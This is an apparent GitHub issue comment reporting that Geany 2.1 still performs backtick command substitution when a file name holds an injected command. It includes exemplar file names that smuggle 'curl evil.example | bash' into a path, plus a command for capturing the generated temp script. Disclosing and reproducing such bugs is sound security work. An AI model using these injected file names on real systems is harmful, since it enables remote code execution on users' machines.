WrapEarnPass left a comment (geany/geany#4611)

My expanded shellscript from geany-2.1 (via debian/testing) does not contain 
the same value as the exemplar.
Exemplar: ``` ./test`curl http://evil.example/payload.sh|bash` ```
Capture the shellscript: ```watch -n 0.01 -g 'cat /tmp/geany*.sh 2>&1 >> /tmp/watch.sh'```
Local test: ```"./test`curl evil.example|bash`" ```

This, however, does still attempt the backtick, as evidenced by the shellscript output:

<img width="811" height="229" alt="Image" src="https://github.com/user-attachments/assets/2bbca231-a3a8-4d9b-a245-d3c35677380d" />

Impact confirmed with modified initial condition.
